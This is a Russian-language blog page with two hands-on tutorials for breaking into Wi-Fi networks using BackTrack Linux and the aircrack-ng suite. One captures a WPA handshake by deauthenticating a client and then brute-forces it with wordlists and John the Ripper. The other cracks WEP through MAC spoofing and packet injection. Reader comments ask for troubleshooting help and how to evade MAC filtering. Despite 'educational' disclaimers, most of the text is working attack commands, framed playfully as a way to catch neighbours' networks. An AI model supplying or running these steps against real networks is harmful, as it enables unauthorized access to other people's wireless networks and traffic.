Меню Рубрики

Wifi linux взлом backtrack

Взламываем Wi-Fi на BackTrack 5 с USB Flash

Тема взлома Wi-Fi уже довольно много обсуждалась на этом сайте, это:

Я тоже внесу свою лепту в это дело. Чтобы хоть как-то выделиться, я решил сделать это с BackTrack 5, установленного на USB Flash.

Для начала скачиваем BackTrack 5 с оф.сайта http://www.backtrack-linux.org/downloads/

Выбираем Release – BackTrack 5, Window Manager на свой вкус, Architecture – 32 или 64 бита, или для arm. Image Type – ISO, Download Type – прямая ссылка или торрент. Образ весит около 2 GB.

После закачки образа, устанавливаем на флешку как описано пользователем Pantheon – Ubuntu с USB? Установка Ubuntu с флешки. Все также.

Только советую не забыть оставить пространство для хранения файлов. В UNetbootin это называется “Space used to preserve files across reboots”. Чем больше флешка – тем больше можно поставить. Я ставил на 4 Гиговую и оставил всего 256 Мб для своих данных. Маловато, хотя самое важное оставить хватает.

После установки система на USB Flash, при включении комьютера ставим грузиться с USB.

Выбираем первый вариант – BackTrack Text – Default Boot Text Mode.

С первого взгляда он может напугать новичков “А где графическая оболочка?? “. Но ничего страшного, при включении просто вводим команду:

И увидим свой любимый графический менеджер. Я увидел Gnome 🙂

Во взломе WPA нас интересует пакет авторизации, вот его мы и будет ловит с помощью пакета aircrack-ng.

Открываем консоль и вводим:

Если wlan1 нету, то он подскажется как назван интерфейс и вводим его, например wlan0.

Если все в порядке, пишем:

Тут также можно выбрать новый интерфейс, который создал airmon-ng – это может быть mon0, ath0 или другие. Честно говоря не очень разобрался зачем второй.

Видим вот такую картину:

Есть сеть 2day, с шифрованием WPA-PSK и одним подключенным клиентом.

  • BSSID – 00:26:5A:71:B6:CC
  • Client – 5C:57:C8:6B:B4:DA

Указываем, чтобы airodump-ng анализировал только нужную нам сетку:

airodump-ng -c 1 –bssid 00:26:5A:71:B6:CC -w 2day wlan1

Хотя, как я вскоре понял, это не обязательно. Он может перехватить нужную информацию и в общем потоке, но не будем отходить от традиций.

Пакет авторизации мы можем поймать только при переподключении клиента, но лучше этот процесс ускорить.

Открываем еще окно терминала и пытаемся отключить его от точки доступа:

aireplay-ng -0 10 -a 00:26:5A:71:B6:CC -c 5C:57:C8:6B:B4:DA wlan1

-0 10 означает количество попыток. Может хватить и одной 😉

И видим долгожданную надпись “WPA Handshake” в правом верхнем углу:

Все! Файлы с нужной информацией у нас в руках.

Осталось вытащить из них пароль. На что могут уйди годы. Ну не будем пессимистами и попробуем для начала пройтись по словарю (который желательно предварительно скачать, чем больше тем лучше).

aircrack-ng -w /root/passwords.lst -b 00:26:5A:71:B6:CC 2day*.cap

Как вы поняли, указываем путь до него, MAC точки доступа и все файлы с нашим названием.

А вот это уже самая долгожданная картинка! Ключ найден из словаря:

На самом деле в словаре такого слова могло и не оказаться, если бы я сам его туда не добавил. Ну мы же делаем это все в образовательных целях.

А на практике мне бы пришлось задействовать John The Ripper или просто John , если не так официально.

Представим, что он у нас установлен:

john –incremental:all –stdout | aircrack-ng -b 00:26:5A:71:B6:CC -w – /root/2day*.cap

Перенаправляем вывод все возможных вариантов символов из john в aircrack-ng. Конечно, для начала стоит попробовать упрощенный перебор, потом отдельно цифры. Но для этого уже курим мануалы John!

Всем удачной рыбалки ) Придумывайте сложные пароли, соседи не дремлют!

Источник

Linux и Windows: помощь админам и пользователям

Администрируем и настраиваем Windows, Linux.

Взламываем WEP, используя Backtrack 3

Я уже рассказывал в этом блоге про Backtrack, в данной же статье мы рассмотрим одно из важнейших его применений. То, о чем я буду рассказывать в данной статье, я уже публиковал, но в виде роликов с ютуба. В данной же статье я объясню все более подробно. Не лишним будет заметить, что данное пособие предназначено для тестовых целей, и не ставит своей целью взращивание хацкеров. В данной статье будет объяснено каким образом можно взломать 64bit и 128bit WEP шифрование на различных WIFI роутерах используя Backtrack, live-дистрибутив Linux. Я выполнял описанные действия на ноутбуках IBM Thinkpad x60, Acer 5672 и WIFI чипсет в этих машинах работал отлично.

Требования:

  • Backtrack 3 на CD или USB
  • Компьютер с поддерживаемой беспроводной картой 802.11
  • Wireless Access point или WIFI роутер, использующий WEP шифрование

Подготавливаем WIFI карту

Для начала мы должны перевести карту в режим “Monitor Mode”. Если вы используете чипчет Intel® PRO/Wireless 3945ABG выполните следующую команду:

modprobe -r iwl3945 modprobe ipwraw

Далее мы должны остановить нашу WIFI карту:

Посмотри под каким именем виден ваш беспроводной интерфейс, далее остановите его командой:

airmon-ng stop [device]

ifconfig down [interface]

Изменяем MAC адрес устройства:

macchanger –mac 00:11:22:33:44:66 [device]

airmon-ng start [device]

Начинаем атаку

Теперь пришло время найти подходящую сеть для атаки. Запускаем команду:

Мы видим доступные сети, в частности MAC адрес (BSSID), канал (CH) и имя (ESSID). Теперь мы начнем собирать данные с WIFI роутера для атаки:

airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

Команда выше поместит полученные данные в файл network.out. Этот файл потребутеся нам позднее когда мы будем готовы взламывать WEP ключ.

Откройте другое окно шелла и оставьте предыдущую команду выполняться. Теперь же мы сгенерируем несколько поддельных пакетов к роутеру для ускорения сбора данных. Используйте следующую команду:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

Если команда выше прошла успешно, мы будем генерировать большое количество пакетов на взламываемую сеть. Введите:

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

Это заставит точку доступа послать большое количество пакетов, которые мы сможем использовать для взлома WEP ключа. Проверьте ваш оставленный в первом окне шелла aerodump-ng. Вы должны увидеть там поле “data”, в котором уже довольно много пакетов.

Когда значение этого поля достигает 10,000-20,000 вы можете начинать взлом ключа. Если нет других доступных сетей, можно попробовать команду:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

Когда мы наберем достаточно пакетов, начинаем взлом:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

Параметр “-n 128″ указывает на 128-битный WEP ключ. Если взлом не получится, используйте “-n 64″

Все, наш взлом завершился! Ключ найден и нам осталось только удалить из вывода символы :

Используйте данную технику для демонстрации слабости WEP шифрования. Я надеюсь вы сами используете WPA2 в ваших сетях.

Постовой

Оригинальные гаджеты и инновационные девайсы в блоге mobilexus.ru

Существуте ли ещё вообще такое понятие как патриотизм в России? Конечно да, существуют ещё люди для которых данные слова не пустой звук. Приходите на наш сайт, и убедитесь в этом.

Еще записи по теме

Комментариев: 16

zdrastvuite. u menya problema s back track 3. kogda ya otkrivayu back track 3 i na4inayu vvodit komandu moi komputer imeet zavis i viklu4aetsya avtomati4eskiy. Ranwe takogo ne bylo, ya ne ponemayu v 4em problema. esli vy znaite v 4em problema, pojaluista daite mne znat. sposibo. moi e-mail: art_yom@mail.ru

как прописать путь для сохранения файла network.out или как посмотреть куда он сохраняется. Я загружаю back track 3 c CD

Не обязательно Back track использовать можно любой из Linux`ов установив нужные пакеты. А network.out сохраняется в ту папку в какой вы находитесь на момент выполнения команды переход в другую папку cd

Спс, а как обойти фильтрацию по мак-адресам?

Не подскажите какие пакеты нужно поставить в Mandiva Linux, а то не находит airplay-ng.

Странно у меня когда отпровляються пакеты очень медлоенный рейт 13 пакетов в 10 секунд. пробывал менять рейт от 1ого мб до 54 не помогает уже не знаю как решить эту проблему -х в аирплай-нг не помогует

Вы должны увидеть там поле “data”, в котором уже довольно много пакетов. —- Мало пакетов или нет вообще что делать?

С линуксом не сталкивался никогда, так что вопрос наверно глупый. Скачал backtrack, записал на диск и гружусь с него. Проблема в том что на видо видна какая-то графическая оболочка, а у меня появляется консоль. Что я не так делаю?

pomogite pojalusta ne kak ne poimu pochemu u menya data ne lovit na 0 a beacons lovit dofiga

Дело в биосе, у тебя back track 3 поставил другую виде карту, просто нужно при загрузке войти в биос BOOT последняя строка жмеш ентер и смени на другую и се заработает..

Все это замечательно, спасибо автору, но. Вот он пишет: “Все, наш взлом завершился! Ключ найден и нам осталось только удалить из вывода символы “. Но, как я понимаю, программа выдала ключ в 16ти ричном коде. А вот как его перевести, если по таблице получается, (я пробовал на примере своего роутера), многие символы в псевдографике =). Так какой же таблицей пользоваться для трансляции в нормальный вид кода? 😉

набрал 32 тысячи пакетов ключ не найден пишит наберите 35 тыщ и так постоянно!в чем может быть проблема!?

Источник


Adblock
detector